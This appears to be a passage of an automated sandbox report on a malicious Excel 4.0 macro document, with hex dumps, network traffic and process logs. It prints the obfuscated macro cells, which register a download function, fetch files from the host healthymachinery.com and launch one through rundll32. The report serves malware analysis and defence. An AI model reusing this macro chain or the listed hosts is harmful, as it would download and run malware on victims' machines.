                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 54588
                  General
                  Stream Path:Book
                  File Type:Applesoft BASIC program data, first line number 8
                  Stream Size:54588
                  Entropy:4.12824675227
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . Y u Z h o u L e e B . . . . . . . . . . . . . . . . . . . . . . . K l o p s . . . . . . . . . . . . . . . . . . N i o k a s e r . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0b 59 75 20 5a 68 6f 75 20 4c 65 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                  Macro 4.0 Code

                  Non-empty cells, in sheet order:
                  • =EXEC("r"&Base!V56&" "&Base!V55&",D"&Base!V57)
                  • =REGISTER(Base!W51&Base!W52&Base!W53&Base!W54&Base!W55&Base!W56,Base!X50&Base!X51&Base!X52&Base!X53&Base!X54&Base!X55&Base!X56&Base!X57&Base!X58&Base!X59&Base!X60&Base!X61&Base!X62&Base!X63&Base!X64&Base!X65&Base!X66&Base!X67,Base!W59&Base!W60&Base!W61&Base!W62&Base!W63&Base!W64,Base!W66,,1,9)
                  • =C153()
                  • =Niokaser(0,"h"&Base!V54&C166&B170,Base!V55,0,0)
                  • =Niokaser(0,Base!V54&C167&B170,Base!V55&"1",0,0)
                  • =Niokaser(0,Base!V54&C168&B170,Base!V55&"2",0,0)
                  • =Niokaser(0,Base!V54&C169&B170,Base!V55&"3",0,0)
                  • =Niokaser(0,Base!V54&C170&B170,Base!V55&"4",0,0)
                  • =HALT()
                  • =GOTO(D153)
                  • =GOTO(B153)
                  • healthymachinery.com/health/32-422-76.assp
                  • healthymachinery.com/health/56754.fdre
                  • healthymachinery.com/health/56754.fdre
                  • healthymachinery.com/health/56754.fdre
                  • healthymachinery.com/health/56754.fdre

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Feb 22, 2021 21:43:00.961786985 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197
                  Feb 22, 2021 21:43:01.016254902 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22
                  Feb 22, 2021 21:43:01.016521931 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197
                  Feb 22, 2021 21:43:01.017865896 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197
                  Feb 22, 2021 21:43:01.071145058 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22
                  Feb 22, 2021 21:43:01.097974062 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22
                  Feb 22, 2021 21:43:01.098009109 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22
                  Feb 22, 2021 21:43:01.098030090 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22
                  Feb 22, 2021 21:43:01.098244905 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197
                  Feb 22, 2021 21:45:00.816421986 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197
                  Feb 22, 2021 21:45:00.870547056 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22
                  Feb 22, 2021 21:45:00.870827913 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Feb 22, 2021 21:43:00.876825094 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Feb 22, 2021 21:43:00.938873053 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Feb 22, 2021 21:43:00.876825094 CET | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | healthymachinery.com | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Feb 22, 2021 21:43:00.938873053 CET | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | healthymachinery.com | | 172.67.149.197 | A (IP address) | IN (0x0001)
                  Feb 22, 2021 21:43:00.938873053 CET | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | healthymachinery.com | | 104.21.29.200 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • healthymachinery.com

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.22 | 49165 | 172.67.149.197 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                  Timestamp: Feb 22, 2021 21:43:01.017865896 CET | kBytes transferred: 0 | Direction: OUT
                  GET /health/32-422-76.assp HTTP/1.1
                  Accept: */*
                  UA-CPU: AMD64
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: healthymachinery.com
                  Connection: Keep-Alive
                  Timestamp: Feb 22, 2021 21:43:01.097974062 CET | kBytes transferred: 2 | Direction: IN
                  HTTP/1.1 200 OK
                  Date: Mon, 22 Feb 2021 20:43:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Set-Cookie: __cfduid=de9fb75c2785608345f9f59dfba82579b1614026581; expires=Wed, 24-Mar-21 20:43:01 GMT; path=/; domain=.healthymachinery.com; HttpOnly; SameSite=Lax
                  X-Frame-Options: SAMEORIGIN
                  cf-request-id: 086d143c3f00001f9587989000000001
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2F1IeoWu4yMF7YxBsX4mWYjb9uhQEB%2FOrGx2og24T%2FzojULsSOm0MRmBzJpJnKnDLzYn%2BEllsKLCbW7cGR2ffJU67A%2BIZtqMPV7wV5GU%2F%2FtxSabznfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                  Server: cloudflare
                  CF-RAY: 625b897398321f95-AMS
                  Content-Encoding: gzip
                  Data Raw: 36 64 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 58 61 6f db 38 12 fd ee 5f 31 d1 01 9b 16 08 25 db 89 1b 27 91 b5 d8 6d b3 8b 00 7b d8 e0 9a a2 b7 58 14 01 25 8e 24 36 14 a9 92 94 1d a3 d7 ff 7e 20 45 3b b2 93 74 37 f7 e5 80 00 11 c9 e1 e3 cc f0 cd 23 e9 f4 e0 dd ef 6f 6f fe b8 be 84 da 36 22 1b a5 07 84 fc c9 4b 10 16 ae 2e e1 f4 53 06 a9 1b 80 42 50 63 16 91 54 e4 b3 01 8e 6f 40 09 c6 31 02 41 65 b5 88 50 92 0f ef a3 0c d2 83 3f 51 32 5e 7e 22 e4 01 2a e0 00 3c 0d 75 fa 32 a8 f9 77 a0 e6 2f 80 aa 6c 40 73 1d 4f 45 f9 18 85 90 5d a4 1a 29 cb 46 a9 e5 56 60 f6 be 33 2d 16 16 19 b4 35 37 35 97 15 18 6e 11 fe 03 6f 85 ea 58 29 a8 c6 34 e9 6d 47 69 83 96 42 51 53 6d d0 2e a2 0f 37 bf 90 79 04 c9 66 a0 b6 b6 25 f8 a5 e3 cb 45 f4 56 49 8b d2 92 9b 75 8b 11 14 7d 6b 11 59 bc b7 89 f3 f9 62 0b f3 3d 94 7f 93 0f 3f 91 b7 aa 69 a9 e5 b9 18 02 5d 5d 2e 2e 59 85 47 45 ad 55 83 8b c9 00 40 d2 06 17 91 56 b9 b2 66 30 43 2a 2e 19 de 1f 81 54 a5 12 42 ad 1e 4d 59 72 5c b5 4a db c1 a4 15 67 b6 5e 30 5c f2 02 89 6f 1c 71 c9 2d a7 82 98 82 8a ed c2 82 cb 3b d0 28 16 91 b1 6b 81 a6 46 b4 11 70 b6 88 8a f2 b6 ef 22 85 31 11 d4 1a cb 45 94 14 4c 92 a2 e2 49 3f 94 14 65 8c 5a 2b 6d 62 6f 64 d7 2d 86 5c f9 76 83 8c d3 45 64 0a 8d 28 8f 5a ad 3e 63 61 b9 92 fd da 3b d4 3f fb 94 3d ef cc e1 83 33 1c 9d 3f 87 7f e9 0f c7 97 bb b4 4b 37 0f b9 3f 3f cb 15 5b 7f 6d a8 ae b8 3c 1f 5f b4 94 31 2e ab f3 f1 b7 b4 77 21 1b 8d 06 94 47 17 d9 64 1c 48 3f 4a 4d a1 79 6b b3 11 00 2f e1 d5 81 a4 4b 5e 51 ab 74 5c 28 75 c7 f1 52 d2 5c 20 7b 0d 5f 47 ae e6 56 5c 32 b5 8a 29 63 97 4b 94 f6 37 6e 2c 4a d4 af 0e df fd fe cf 40 d3 df 14 65 c8 0e 8f a0 ec a4 0f 03 5e 6d 66 03 2c a9 86 00 2c 60 01 4c 15 5d 83 d2 c6 15 da 4b 81 ee f3 e7 f5 15 7b 75 d8 db
                  Data Ascii: 6d3Xao8_1%'m{X%$6~ E;t7#oo6"K.SBPcTo@1AeP?Q2^~"*<u2w/l@sOE])FV`3-575noX)4mGiBQSm.7yf%EVIu}kYb=?i]]..YGEU@Vf0C*.TBMYr\Jg^0\oq-;(kFp"1ELI?eZ+mbod-\vEd(Z>ca;?=3?K7??[m<_1.w!GdH?JMyk/K^Qt\(uR\ {_GV\2)cK7n,J@e^mf,,`L]K{u


                  Code Manipulations

                  Statistics

                  Behavior

                  System Behavior

                  General

                  Start time:21:42:33
                  Start date:22/02/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13f970000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:21:42:36
                  Start date:22/02/2021
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 ..\MORI.BAST,DllRegisterServer
                  Imagebase:0xff790000
                  File size:45568 bytes
                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis
